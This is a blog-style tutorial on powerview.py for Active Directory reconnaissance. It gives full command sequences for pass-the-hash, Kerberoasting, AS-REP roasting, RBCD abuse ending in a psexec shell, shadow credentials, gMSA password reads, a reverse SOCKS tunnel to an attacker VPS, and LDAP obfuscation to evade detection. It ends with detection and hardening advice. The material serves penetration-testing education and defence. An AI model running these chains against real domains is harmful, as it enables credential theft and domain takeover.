Linux PowerView.py: The Complete Guide to Active Directory Enumeration
In the world of offensive security, the ability to silently map a target environment, understand its internal structure, and identify its weaknesses is what separates a script kiddie from a seasoned penetration tester. When it comes to Windows enterprise environments, Active Directory (AD) is the crown jewel — the central nervous system that governs authentication, authorization, and access across the entire organization.
For this delicate task of domain reconnaissance, one tool has risen to near-legendary status: PowerView. Originally a PowerShell script authored by Will Schroeder (harmj0y) as part of the PowerSploit framework, PowerView has evolved into a powerful Python-based tool called powerview.py, making it an indispensable asset for hackers and security professionals operating on Linux. This comprehensive guide walks you through everything from initial setup to advanced attack chains, with hands-on examples at every step.
All techniques described in this article are for educational purposes and authorized penetration testing only. Unauthorized access to computer systems is illegal and punishable by law. Always obtain written permission before testing any system you do not own.
Why Active Directory Enumeration Matters
"Listen carefully to your enemy because they will tell you everything you need to know in order to defeat them." — OTW, Hackers-Arise
Active Directory was not designed with stealth in mind. It is a directory service, and its primary function is to provide information. Even with the lowest level of domain user privileges — a standard employee account — an attacker can uncover a remarkable wealth of information. This is by design: AD must be queryable to function. The consequence is that a patient, methodical attacker can map an entire enterprise network without ever triggering a traditional intrusion detection system.
Figure 1: Core Active Directory object types — Domains, Computers, OUs, Groups, Users, and Printers.
The information available through low-privilege LDAP queries includes user accounts and their attributes, computer objects and their roles, group memberships and permissions, Kerberos service principal names (SPNs), delegation configurations, trust relationships between domains, Group Policy Objects (GPOs), and Access Control Lists (ACLs). Understanding how to extract and interpret this data is the foundation of every successful Active Directory attack chain.
The Attacker's Mindset: Enumeration Before Exploitation
A mature hacker understands that noisy port scans and brute-force attacks are the tools of amateurs. The professional approach is to blend in with normal traffic, asking the same questions that legitimate administrative tools ask. The domain controller will answer honestly and completely, because from its perspective, you are just another authorized user querying the directory.
Figure 2: A structured Active Directory penetration testing methodology — from initial access through full domain compromise.
Understanding PowerView.py
PowerView.py is a Python 3 reimplementation of the original PowerView.ps1 PowerShell script, created by aniqfakhrul. It communicates with Active Directory using the LDAP and LDAPS protocols, as well as the Global Catalog (GC) and ADWS interfaces. The key advantage over the original PowerShell script is platform independence — it runs on any system with Python 3 installed, making it ideal for Linux-based attack platforms like Kali Linux and Parrot OS.
🔗 Multi-Protocol Support
Supports LDAP, LDAPS, Global Catalog, GC-SSL, and ADWS bindings with automatic fallback.
🔑 Flexible Authentication
Password, NTLM hash, Kerberos ticket, and PFX certificate authentication methods.
📋 Interactive Console
A persistent LDAP session with tab-completion, command history, and output formatting.
🔄 LDAP Obfuscation
Built-in query obfuscation to evade LDAP-based detection and monitoring systems.
🌐 Web Interface
Optional web UI for browsing AD objects from a browser — useful for collaborative assessments.
🔁 Relay Mode
Built-in NTLM relay capability to capture and relay authentication over HTTP/LDAP.
The original PowerView.ps1 is now detected by virtually every major antivirus and EDR solution. It also requires a Windows host with PowerShell. PowerView.py runs on Linux, bypasses Windows-based AV entirely, and can be tunneled through proxychains for maximum stealth.
Installation & Environment Setup
Setting up powerview.py on a Kali Linux or Ubuntu-based attack machine is straightforward. The following steps cover the standard installation procedure as well as optional dependencies for Kerberos authentication.
Install Kerberos Development Libraries
Required for Kerberos ticket-based authentication. On Debian/Ubuntu systems:
$ sudo apt-get update $ sudo apt-get install -y libkrb5-dev gcc python3-dev
Install pipx (Recommended)
pipx installs Python applications in isolated environments, preventing dependency conflicts.
$ sudo apt-get install -y pipx $ pipx ensurepath
Install PowerView.py
Install directly from the GitHub repository for the latest version:
$ pipx install "git+https://github.com/aniqfakhrul/powerview.py" # Or install from PyPI for a stable release: $ pipx install powerview
Verify Installation
Confirm the tool is correctly installed and accessible from your PATH:
$ powerview --help usage: powerview [-h] [-v] [--use-ldap] [--use-ldaps] [--use-gc] [--use-gc-ldaps] [--use-adws] [-k] [-H HASH] [--pfx PFX] [--no-pass] [--obfuscate] [--web] [--relay] ... [target] PowerView.py - Active Directory Enumeration Tool
Alternative Installation Methods
| Method | Command | Best For |
|---|---|---|
| pipx (recommended) | pipx install "git+https://github.com/aniqfakhrul/powerview.py" |
Isolated environment, no conflicts |
| pip (global) | pip3 install powerview |
Quick setup on dedicated VMs |
| Nix | nix run github:aniqfakhrul/powerview.py |
NixOS / reproducible environments |
| Docker | docker run --rm -it aniqfakhrul/powerview.py |
Containerized, portable deployments |
Authentication & Connection Methods
Connecting to a domain controller with powerview.py is highly flexible. The tool supports multiple authentication mechanisms, making it adaptable to a wide range of engagement scenarios — from standard password authentication to advanced certificate-based and hash-based techniques.
Method 1: Password Authentication
The simplest and most common method. Use a known username and password combination:
# Standard password authentication $ powerview domain.local/jsmith:Password123!@192.168.1.10 # With LDAPS (encrypted) $ powerview domain.local/jsmith:Password123!@192.168.1.10 --use-ldaps # With Global Catalog (port 3268 - for multi-domain forests) $ powerview domain.local/jsmith:Password123!@192.168.1.10 --use-gc
Method 2: Pass-the-Hash (NTLM)
When you have captured an NTLM hash (via Responder, Mimikatz, secretsdump, etc.) but do not know the plaintext password, you can authenticate directly with the hash:
# NTLM hash format: LM:NT (use 32 zeros for LM if unknown) $ powerview domain.local/administrator@192.168.1.10 \ -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c # NT hash only (modern systems) $ powerview domain.local/administrator@192.168.1.10 \ -H 8846f7eaee8fb117ad06bdd830b7586c
Method 3: Kerberos Ticket Authentication (Pass-the-Ticket)
If you have obtained a valid Kerberos TGT or TGS ticket (e.g., via ticket injection or Rubeus), you can use it directly:
# Export the ccache ticket path $ export KRB5CCNAME=/tmp/administrator.ccache # Connect using Kerberos (-k flag) $ powerview domain.local/administrator@dc01.domain.local \ -k --no-pass -ns 192.168.1.10
Method 4: Certificate-Based Authentication (PFX / Schannel)
Modern Active Directory environments increasingly use certificate-based authentication via Active Directory Certificate Services (ADCS). If you have obtained a PFX certificate (e.g., via ESC1 or shadow credentials), you can authenticate with it:
# PFX certificate (powerview will prompt for password if encrypted) $ powerview 192.168.1.10 --pfx administrator.pfx # With explicit certificate password $ powerview 192.168.1.10 --pfx administrator.pfx --pfx-pass certpassword
Tunneling Through Proxychains
When your target domain controller is not directly reachable from your attack machine, you can tunnel powerview.py through a SOCKS proxy using proxychains. This is essential for internal network pivoting:
# Step 1: Create a reverse SSH SOCKS tunnel from the compromised host compromised$ ssh -R 1080:localhost:1080 attacker@YOUR_VPS_IP -Nf # Step 2: Configure /etc/proxychains4.conf on your attack machine # Add: socks5 127.0.0.1 1080 # Step 3: Run powerview through proxychains $ proxychains4 -q powerview domain.local/jsmith:Password123!@192.168.1.10
The Machine Account Quota (MAQ) Trick
What if you have a shell on a domain-joined machine but no valid user credentials? By default, every authenticated user in Active Directory can create up to 10 machine accounts. This is controlled by the ms-DS-MachineAccountQuota attribute on the domain object. You can exploit this to create a machine account and use its credentials for enumeration:
# Create a machine account using impacket-addcomputer $ impacket-addcomputer domain.local/anyuser:anypassword \ -computer-name ATTACKER01$ \ -computer-pass AttackerPass123! # Now use the machine account to connect with powerview $ powerview domain.local/'ATTACKER01$':AttackerPass123!@192.168.1.10
Machine accounts created during testing should be cleaned up after the engagement. Orphaned machine accounts are a red flag for blue teams and may trigger incident response procedures. Use Remove-DomainComputer in powerview.py to remove them.
Core Enumeration Techniques
Once connected to the domain controller, you enter the interactive powerview.py console, indicated by the PV > prompt. From here, you can explore the entire Active Directory structure. Pressing Tab twice will display all available commands.
Figure 3: PowerView enumeration attack — querying users, groups, permissions, and domain admins from a single low-privilege account.
Domain & Forest Information
Start by gathering high-level information about the domain and forest. This establishes the scope of your engagement and reveals trust relationships:
# Get basic domain information PV > Get-Domain name : DOMAIN distinguishedName : DC=domain,DC=local domainFunctionality : Windows2016Domain forestFunctionality : Windows2016Forest ms-DS-MachineAccountQuota : 10 # Get all domain controllers PV > Get-DomainController # Get forest trust relationships PV > Get-DomainTrust # Check Machine Account Quota (important for MAQ abuse) PV > Get-Domain -Properties ms-DS-MachineAccountQuota
Computer Enumeration
Computers are Active Directory objects with their own set of attributes, permissions, and potential misconfigurations. Enumerating computers is critical for identifying high-value targets, legacy systems, and delegation vulnerabilities:
# List all enabled computers PV > Get-DomainComputer -Enabled # Count enabled computers PV > Get-DomainComputer -Enabled -Count # Export computer names to file for further processing PV > Get-DomainComputer -Enabled -Properties name -OutFile /tmp/computers.txt # Find computers with UNCONSTRAINED delegation (high-value targets!) PV > Get-DomainComputer -Unconstrained # Find computers with CONSTRAINED delegation PV > Get-DomainComputer -TrustedToAuth # Find computers running older, potentially vulnerable OS versions PV > Get-DomainComputer -Properties name,operatingsystem | Where 'operatingsystem contains 2008' # Get detailed info about a specific computer PV > Get-NetComputerInfo -ComputerName DC01 # Display results in a formatted table PV > Get-DomainComputer -Properties name,operatingsystem,dnshostname -TableView
After exporting computer names, use for i in $(cat /tmp/computers.txt); do ping -c1 -W1 $i 2>/dev/null && echo "$i is UP"; done to identify live hosts. Combine with nmap to fingerprint services on high-value targets.
User Enumeration
User enumeration is the heart of Active Directory reconnaissance. Understanding who has what privileges, which accounts have weak configurations, and which users are currently active is essential for planning your attack path:
# List all domain users PV > Get-DomainUser # Get specific user details PV > Get-DomainUser -Identity administrator # Find users with Service Principal Names (Kerberoasting targets!) PV > Get-DomainUser -SPN -Properties sAMAccountName,servicePrincipalName # Find users with AdminCount=1 (protected/privileged accounts) PV > Get-DomainUser -AdminCount -Properties sAMAccountName,memberOf # Find users that do NOT require Kerberos pre-auth (AS-REP Roasting!) PV > Get-DomainUser -PreAuthNotRequired -Properties sAMAccountName # Find users with passwords that never expire PV > Get-DomainUser -Where 'useraccountcontrol contains DONT_EXPIRE_PASSWORD' # Find users with description fields (often contain passwords!) PV > Get-DomainUser -Properties sAMAccountName,description -Where 'description ne ""' # Find users who haven't changed passwords in 90+ days PV > Get-DomainUser -Properties sAMAccountName,pwdLastSet -TableView # Export all users to file PV > Get-DomainUser -Properties sAMAccountName -OutFile /tmp/users.txt
A surprisingly common finding in real-world assessments is plaintext passwords stored in user description fields. Administrators sometimes set temporary passwords in descriptions during account provisioning and forget to remove them. Always check this field during enumeration.
Group Enumeration
Groups are the cornerstone of privilege management in Active Directory. Understanding group memberships reveals the power structure of the domain and identifies paths to privilege escalation:
# List all domain groups PV > Get-DomainGroup # Get members of Domain Admins (the ultimate target) PV > Get-DomainGroupMember -Identity "Domain Admins" # Get members of Enterprise Admins PV > Get-DomainGroupMember -Identity "Enterprise Admins" # Get members of Backup Operators (can backup SAM/NTDS!) PV > Get-DomainGroupMember -Identity "Backup Operators" # Get members of Remote Desktop Users PV > Get-DomainGroupMember -Identity "Remote Desktop Users" # Recursively enumerate nested group memberships PV > Get-DomainGroupMember -Identity "Domain Admins" -Recurse # Find groups a specific user belongs to PV > Get-DomainGroup -MemberIdentity jsmith # Find foreign group members (cross-domain trust enumeration) PV > Get-DomainForeignGroupMember
Organizational Unit (OU) Enumeration
OUs define the administrative structure of the domain and determine how Group Policy Objects are applied. Understanding the OU structure helps identify administrative boundaries and potential GPO-based attack paths:
# List all Organizational Units PV > Get-DomainOU # Get OUs with their linked GPOs PV > Get-DomainOU -Properties name,gplink # Find computers in a specific OU PV > Get-DomainComputer -SearchBase "OU=Servers,DC=domain,DC=local"
Session, Share & Service Enumeration
Active Login Session Enumeration
One of the most tactically valuable forms of enumeration is identifying where privileged users are currently logged in. If a Domain Admin is actively working on a workstation, that workstation becomes a high-priority target for credential harvesting:
# List currently logged-on users via registry (requires admin rights) PV > Get-RegLoggedOn -ComputerName WORKSTATION01 # Enumerate active network sessions on a server PV > Get-NetSession -ComputerName FS01 # Find all machines where Domain Admins are logged in PV > Get-NetLoggedOn -ComputerName DC01 # Enumerate terminal server sessions PV > Get-NetTerminalSession -ComputerName RDSERVER01
Network Share Enumeration
Network shares are a treasure trove of sensitive information. Configuration files, scripts, backups, and even credential files are frequently found on accessible shares. Enumerating and accessing shares should be a priority in any internal assessment:
# Enumerate shares on a specific computer PV > Get-NetShare -ComputerName FS01 Name Type Remark ---- ---- ------ ADMIN$ DISKTREE Remote Admin C$ DISKTREE Default share IPC$ IPC Remote IPC Finance DISKTREE Finance Department Files IT_Scripts DISKTREE IT Automation Scripts Backups DISKTREE Server Backups # After identifying shares, access them via SMB $ smbclient //192.168.1.20/IT_Scripts -U 'domain.local/jsmith%Password123!'
Named Pipe Enumeration
Named pipes are inter-process communication channels in Windows. Certain named pipes, when accessible, can be abused for privilege escalation or lateral movement:
# Enumerate accessible named pipes on a remote host PV > Get-NamedPipes -ComputerName DC01
Exchange Server Enumeration
Microsoft Exchange servers are extremely high-value targets. They have historically been vulnerable to critical exploit chains (ProxyLogon, ProxyShell, ProxyNotShell) and, once compromised, provide access to email data, the ability to escalate to SYSTEM, and a pathway to domain compromise through Active Directory integration:
# Find Exchange servers in the domain PV > Get-ExchangeServer -Properties cn,serialNumber,msExchCurrentServerRoles # Enumerate Exchange mailboxes PV > Get-ExchangeMailbox # Enumerate Exchange databases PV > Get-ExchangeDatabase
ACL, Delegation & GPO Enumeration
Access Control List (ACL) Enumeration
ACLs define who can do what to which Active Directory objects. Misconfigured ACLs are one of the most common and impactful findings in AD assessments. A single overly permissive ACE (Access Control Entry) can provide a direct path to Domain Admin:
# Get ACLs for a specific object PV > Get-DomainObjectAcl -Identity administrator -ResolveGUIDs # Find interesting ACLs (GenericAll, WriteDACL, WriteOwner, etc.) PV > Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs # Find ACLs where a specific user has interesting rights PV > Get-DomainObjectAcl -Identity * -ResolveGUIDs | \ Where 'SecurityIdentifier eq jsmith' # Get the owner of a domain object PV > Get-DomainObjectOwner -Identity "Domain Admins"
| ACE Right | What It Allows | Potential Attack |
|---|---|---|
GenericAll |
Full control over the object | Reset password, add to groups, modify attributes |
GenericWrite |
Write to any non-protected attribute | Set SPN for Kerberoasting, modify logon scripts |
WriteOwner |
Change the object's owner | Take ownership, then modify ACL |
WriteDACL |
Modify the object's ACL | Grant yourself GenericAll, then full control |
ForceChangePassword |
Reset user's password without knowing current | Takeover any user account |
AllExtendedRights |
All extended rights including password reset | Password reset, DCSync rights |
DS-Replication-Get-Changes-All |
Replicate directory changes (DCSync) | Dump all domain hashes via DCSync |
Delegation Enumeration
Kerberos delegation allows services to impersonate users when accessing other services. Misconfigured delegation is a critical vulnerability that can lead to full domain compromise:
# Find computers with UNCONSTRAINED delegation PV > Get-DomainComputer -Unconstrained -Properties name,dnshostname # Find users with UNCONSTRAINED delegation PV > Get-DomainUser -Unconstrained -Properties sAMAccountName # Find computers with CONSTRAINED delegation (TrustedToAuth) PV > Get-DomainComputer -TrustedToAuth -Properties name,msDS-AllowedToDelegateTo # Find RBCD configurations PV > Get-DomainRBCD
Figure 4: Unconstrained delegation attack — when a privileged user authenticates to a compromised server, their TGT is cached and can be extracted for impersonation.
Group Policy Object (GPO) Enumeration
GPOs control security settings across the domain. Misconfigured GPO permissions can allow an attacker to modify policies and push malicious configurations to all machines in an OU:
# List all GPOs in the domain PV > Get-DomainGPO # Get GPO settings PV > Get-DomainGPOSettings # Find GPOs that add users to local admin groups PV > Get-DomainGPOLocalGroup # Find GPOs applied to a specific OU PV > Get-DomainGPO -SearchBase "OU=Workstations,DC=domain,DC=local"
Advanced Attack Techniques
Kerberoasting
Kerberoasting is one of the most effective and stealthy attacks against Active Directory. Any domain user can request a Kerberos service ticket (TGS) for any service account with an SPN configured. The TGS is encrypted with the service account's password hash, which can then be cracked offline — no interaction with the target service required:
Figure 5: Kerberoasting attack flow — the attacker requests TGS tickets for SPN-configured accounts and cracks them offline.
# Step 1: Identify Kerberoastable accounts with powerview PV > Get-DomainUser -SPN -Properties sAMAccountName,servicePrincipalName,adminCount sAMAccountName : svc_sql servicePrincipalName : MSSQLSvc/SQLSERVER01.domain.local:1433 adminCount : 0 sAMAccountName : svc_iis servicePrincipalName : HTTP/webserver.domain.local adminCount : 0 # Step 2: Request TGS tickets using impacket-GetUserSPNs $ impacket-GetUserSPNs domain.local/jsmith:Password123! \ -dc-ip 192.168.1.10 -request -outputfile /tmp/kerberoast.txt # Step 3: Crack the tickets offline with hashcat $ hashcat -m 13100 /tmp/kerberoast.txt /usr/share/wordlists/rockyou.txt \ --rules-file /usr/share/hashcat/rules/best64.rule # Step 4: Crack with john the ripper (alternative) $ john --wordlist=/usr/share/wordlists/rockyou.txt /tmp/kerberoast.txt
AS-REP Roasting
AS-REP Roasting targets user accounts that have Kerberos pre-authentication disabled (DONT_REQ_PREAUTH). For these accounts, an attacker can request an AS-REP message without knowing the user's password, and the response contains data encrypted with the user's password hash:
# Step 1: Find accounts without pre-auth requirement PV > Get-DomainUser -PreAuthNotRequired -Properties sAMAccountName # Step 2: Request AS-REP hashes $ impacket-GetNPUsers domain.local/ -usersfile /tmp/users.txt \ -dc-ip 192.168.1.10 -format hashcat -outputfile /tmp/asrep.txt # Step 3: Crack offline $ hashcat -m 18200 /tmp/asrep.txt /usr/share/wordlists/rockyou.txt
Resource-Based Constrained Delegation (RBCD) Abuse
RBCD is a powerful privilege escalation technique. If an attacker can write to the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of a computer object, they can configure it to allow a machine account they control to impersonate any user on that computer — including Domain Admins:
Figure 6: Active Directory attack path visualization — chaining misconfigurations from initial access to Domain Admin.
# Step 1: Check Machine Account Quota PV > Get-Domain -Properties ms-DS-MachineAccountQuota # Step 2: Create a controlled machine account PV > Add-DomainComputer -ComputerName ATTACKER01 -ComputerPass AttackerPass123! [+] Successfully added machine account ATTACKER01$ with password AttackerPass123! # Step 3: Configure RBCD on the target computer PV > Add-DomainObjectAcl -TargetIdentity SQLSERVER01 \ -PrincipalIdentity ATTACKER01 -Rights RBCD [+] ATTACKER01$ can now impersonate users on SQLSERVER01$ via S4U2Proxy # Step 4: Verify the RBCD configuration PV > Get-DomainComputer SQLSERVER01 -Properties msDS-AllowedToActOnBehalfOfOtherIdentity # Step 5: Request a service ticket impersonating Administrator $ impacket-getST domain.local/'ATTACKER01$':AttackerPass123! \ -spn CIFS/SQLSERVER01.domain.local \ -impersonate Administrator \ -dc-ip 192.168.1.10 # Step 6: Use the ticket to get a shell $ KRB5CCNAME=Administrator.ccache impacket-psexec \ Administrator@SQLSERVER01.domain.local -k -no-pass
Shadow Credentials Attack
Shadow Credentials is a modern attack technique that abuses the msDS-KeyCredentialLink attribute. If an attacker has GenericWrite or WriteProperty rights over a user or computer object, they can add a shadow credential (a certificate key pair) to that object and then use it to obtain a TGT:
# Add shadow credentials to a target user PV > Set-ShadowCredential -TargetIdentity jdoe -OutFile /tmp/jdoe.pfx [+] Shadow credentials added to jdoe [+] Certificate saved to /tmp/jdoe.pfx # Authenticate using the certificate to get a TGT $ impacket-gettgtpkinit domain.local/jdoe -cert-pfx /tmp/jdoe.pfx /tmp/jdoe.ccache # View existing shadow credentials PV > Get-ShadowCred -Identity jdoe
gMSA Password Extraction
Group Managed Service Accounts (gMSAs) are a more secure alternative to traditional service accounts, with automatically managed passwords. However, if an attacker has the appropriate permissions, they can read the gMSA password blob and use it for authentication:
# Find all gMSA accounts and check read permissions PV > Get-DomainGMSA ObjectDnsHostname : dc01.domain.local ObjectSAN : gMSA01$ ObjectSID : S-1-5-21-...-3654 PrincipallAllowedToRead : DOMAIN\svc_backup GMSAPassword : 54908ce8beb44115cfb5b6a265af33f0 <-- readable! # Enumerate gMSA via computer objects PV > Get-DomainComputer -GMSAPassword
BloodHound Integration & Attack Path Analysis
While powerview.py excels at targeted enumeration, BloodHound is the industry-standard tool for visualizing complex Active Directory relationships and automatically identifying attack paths. The two tools complement each other perfectly.
Figure 7: BloodHound graph visualization showing attack paths from a compromised user to Domain Admin through nested group memberships and ACL relationships.
# Collect BloodHound data using bloodhound-python (Linux) $ pip3 install bloodhound $ bloodhound-python -u jsmith -p Password123! \ -d domain.local -ns 192.168.1.10 \ -c All --zip # Or use SharpHound on a Windows host (if available) # SharpHound.exe -c All --outputdirectory C:\temp # Start BloodHound and import the zip file $ neo4j start $ bloodhound &
BloodHound includes powerful pre-built Cypher queries: "Find Shortest Paths to Domain Admins", "Find Principals with DCSync Rights", "Find Computers where Domain Users are Local Admin", "Find Kerberoastable Users with Path to High Value Targets", and many more. These queries can instantly reveal critical attack paths that would take hours to find manually.
LDAP Obfuscation & Detection Evasion
Modern Security Operations Centers (SOCs) monitor LDAP traffic for suspicious enumeration patterns. powerview.py includes a built-in obfuscation engine that transforms LDAP queries to vary their observable patterns while preserving their functional intent:
# Enable obfuscation at connection time $ powerview domain.local/jsmith:Password123!@192.168.1.10 --obfuscate # Obfuscation techniques applied automatically: # - OID attribute encoding with spacing/zero-variation # - Random casing of attributes and values # - Numeric/SID zero-prepend on values # - Hex-encoding of eligible values # - Context-aware spacing in filters and DNs # - Equality to approximation operator substitution # - Wildcard expansion # - DN hex escaping with random casing
| Evasion Technique | Description | Effectiveness |
|---|---|---|
| LDAP Obfuscation | Randomizes LDAP query structure while preserving results | High against signature-based detection |
| LDAPS (Encrypted) | Encrypts LDAP traffic, preventing plaintext inspection | High against network-level monitoring |
| Proxychains Tunneling | Routes traffic through legitimate-looking proxies | High for network-level detection |
| Slow Enumeration | Rate-limiting queries to avoid velocity-based alerts | Medium against behavioral analytics |
| Kerberos Auth | Uses Kerberos instead of NTLM to avoid NTLM-based alerts | Medium against authentication monitoring |
Blue Team: Detection & Defense Strategies
Understanding how attackers enumerate your environment is the first step to defending it. The following recommendations are based on real-world incident response findings and industry best practices:
Detection Strategies
# Windows Event Log IDs to monitor: # Event ID 4662 - An operation was performed on an object (LDAP reads) # Event ID 4768 - Kerberos TGT request (AS-REQ) # Event ID 4769 - Kerberos TGS request (TGS-REQ) - Kerberoasting # Event ID 4771 - Kerberos pre-auth failure # Event ID 4776 - NTLM authentication attempt # Event ID 5136 - Directory service object modified (RBCD, Shadow Creds) # Event ID 4741 - Computer account created (MAQ abuse) # Splunk query for Kerberoasting detection: # index=security EventCode=4769 TicketEncryptionType=0x17 # | stats count by Account_Name, Client_Address # | where count > 5
Hardening Recommendations
| Vulnerability | Remediation | Priority |
|---|---|---|
| Kerberoastable service accounts | Use gMSA accounts; enforce 25+ char passwords; use AES encryption (RC4 disabled) | Critical |
| AS-REP Roastable accounts | Enable Kerberos pre-authentication on all accounts; audit quarterly | Critical |
| Unconstrained delegation | Migrate to constrained or resource-based delegation; mark sensitive accounts as "Account is sensitive" | Critical |
| High Machine Account Quota | Set ms-DS-MachineAccountQuota to 0; use dedicated accounts for domain joins |
High |
| Overpermissive ACLs | Regular ACL audits with BloodHound/PingCastle; remove GenericAll/WriteDACL from non-admin accounts | High |
| Passwords in description fields | Audit all user description fields; implement process controls for account provisioning | High |
| Excessive share permissions | Implement least-privilege on all shares; audit with automated tools quarterly | Medium |
| Legacy OS computers | Decommission or isolate legacy systems; apply compensating controls (firewall, EDR) | Medium |
Implementing a Tiered Administration Model
Microsoft's Active Directory Tier Model (also known as the Enterprise Access Model) is one of the most effective architectural controls for limiting the blast radius of a domain compromise. The model separates administrative accounts into three tiers:
Tier 0 — Domain Controllers & Identity Infrastructure
Domain Controllers, ADCS servers, AD Connect, privileged identity management systems. Tier 0 admins ONLY log into Tier 0 systems. Compromise of Tier 0 = full domain compromise.
Tier 1 — Server Infrastructure
Member servers, applications, databases. Tier 1 admins manage servers but cannot access Tier 0 systems. Compromise is contained to the server tier.
Tier 2 — Workstations & End-User Devices
Desktops, laptops, mobile devices. Tier 2 admins (helpdesk) can only access workstations. Compromise is limited to the workstation tier.
PowerView.py Command Cheatsheet
| Category | Command | Description |
|---|---|---|
| Domain | Get-Domain | Get domain information |
Get-DomainController | List domain controllers | |
Get-DomainTrust | Enumerate trust relationships | |
Get-DomainDNSRecord | Enumerate DNS records | |
| Users | Get-DomainUser | List all users |
Get-DomainUser -SPN | Find Kerberoastable users | |
Get-DomainUser -AdminCount | Find privileged users | |
Get-DomainUser -PreAuthNotRequired | Find AS-REP Roastable users | |
Set-DomainUserPassword | Reset a user's password | |
| Computers | Get-DomainComputer | List all computers |
Get-DomainComputer -Unconstrained | Find unconstrained delegation | |
Get-DomainComputer -TrustedToAuth | Find constrained delegation | |
Get-NetComputerInfo | Get detailed computer info | |
| Groups | Get-DomainGroup | List all groups |
Get-DomainGroupMember | Get group members | |
Get-DomainForeignGroupMember | Cross-domain group members | |
| ACLs | Get-DomainObjectAcl | Get object ACLs |
Get-DomainObjectOwner | Get object owner | |
Add-DomainObjectAcl | Add ACE to object | |
| Sessions | Get-RegLoggedOn | Registry-based logged-on users |
Get-NetSession | Active network sessions | |
Get-NetLoggedOn | Logged-on users (WMI) | |
| Shares | Get-NetShare | Enumerate network shares |
Get-NamedPipes | Enumerate named pipes | |
| Attacks | Set-ShadowCredential | Add shadow credentials |
Set-DomainRBCD | Configure RBCD | |
Get-DomainGMSA | Read gMSA passwords |
Conclusion
powerview.py represents the evolution of Active Directory enumeration tooling — bringing the power of the legendary PowerView.ps1 to the Linux platform while adding new capabilities, flexible authentication methods, and built-in evasion techniques. Whether you are a red teamer mapping a target domain, a penetration tester looking for privilege escalation paths, or a blue teamer trying to understand your attack surface, this tool provides an unparalleled view into the inner workings of Active Directory.
The key takeaway is that Active Directory is inherently transparent. Every domain user can see almost everything. The information is there, waiting to be read. The question is whether your security team reads it before the attackers do. By regularly running tools like powerview.py and BloodHound against your own environment, you can identify and remediate misconfigurations before they become breach headlines.
Figure 8: Active Directory penetration testing methodology — a structured approach to identifying and exploiting domain vulnerabilities.
Reconnaissance may not feel exciting at first, but it is the true foundation of effective security work. When you learn to listen to what the domain is already telling you, the path forward becomes much clearer.
References & Further Reading
- Hackers-Arise: Linux: PowerView for Linux — How Hackers Enumerate Domains. hackers-arise.com
- aniqfakhrul: powerview.py — Active Directory Enumeration Tool. github.com/aniqfakhrul/powerview.py
- PowerView.py Official Wiki — Installation, Usage, and Cheatsheets. github.com/aniqfakhrul/powerview.py/wiki
- HackTricks: Pentesting LDAP (389, 636, 3268, 3269). book.hacktricks.xyz
- ired.team: Active Directory Enumeration with PowerView. ired.team
- Hack The Box: Active Directory Penetration Testing Cheatsheet and Guide. hackthebox.com
- Netwrix: Kerberoasting Attack — Detection and Prevention Strategies. netwrix.com
- Praetorian: How to Exploit Active Directory ACL Attack Paths Through LDAP Relaying. praetorian.com
- Australian Cyber Security Centre: Detecting and Mitigating Active Directory Compromises. cyber.gov.au
- Microsoft: Implementing Least-Privilege Administrative Models. learn.microsoft.com
Comments
Post a Comment